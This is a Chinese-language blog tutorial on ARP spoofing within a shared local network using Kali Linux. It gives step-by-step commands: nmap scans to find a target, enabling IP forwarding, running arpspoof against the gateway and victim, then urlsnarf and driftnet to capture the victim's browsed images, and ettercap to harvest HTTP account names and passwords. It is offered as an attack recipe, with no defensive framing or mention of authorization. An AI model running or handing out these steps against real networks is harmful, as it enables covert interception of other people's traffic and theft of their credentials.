同局域网arp欺骗
同局域网arp欺骗
可以获取对方访问的 http图片,http账号和密码
虚拟机下kali系统
见另一篇文章见虚拟机安装kali系统
发现目标
和目标机在同一局域网下。
查看本机网络配置
- 方法1
iwconfih
- 方法2
ifconfig
nmap扫描网段发现目标
nmap 192.168.1.0/24
- 附录
- 批量扫描一个网段的主机存活数
nmap -sP 192.168.1.0/24
- 跳过Ping探测
nmap -P0 192.168.1.0/24
- 扫描IP范围
nmap -sP 192.168.1.1-50
arpspoof欺骗目标
- 开启IP转发 让目标机能上网
将1
写入到/proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
- 查看是否成功
cat /proc/sys/net/ipv4/ip_forward
返回 1
成功
- 开始欺骗
arpspoof -i 网卡 -t 网关ip 目标ip
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.2
现在目标机的数据就会经过,本机。
获取目标机访问的图片
命令行
urlsnarf -i wlan0
driftnet获取目标图片
新建终端窗口 ctrl
+shift
+T
。保持 ARP
欺骗
语法: driftnet [options] [filter code]
- 主要参数:
options | filter code |
---|---|
-b | 捕获到新的图片时发出嘟嘟声 |
-i interface | 选择监听接口 |
-f | file |
-p | 不让所监听的接口使用混杂模式 |
-a | 后台模式,将捕获的图片保存到目录中(不会显示在屏幕上) |
-m number | 指定保存图片数的数目 |
-d directory | 指定保存图片的路径 |
-x prefix | 指定保存图片的前缀名 |
- 使用举例:
- 实时监听:
driftnet -i wlan0
- 保存所有图片到本地
driftnet -i wlan0 -d /home/abc/图片/wifi -a
获取目标账号密码
新建终端窗口 ctrl
+shift
+T
保持 ARP
欺骗
获取目标机在 http
网址输入的账号,密码
ettercap -Tq -i wlan0
原文作者: ababwbq
原文链接: https://www.unkaer.cf/arp.html
版权声明: 转载请注明出处(必须保留原文作者署名原文链接)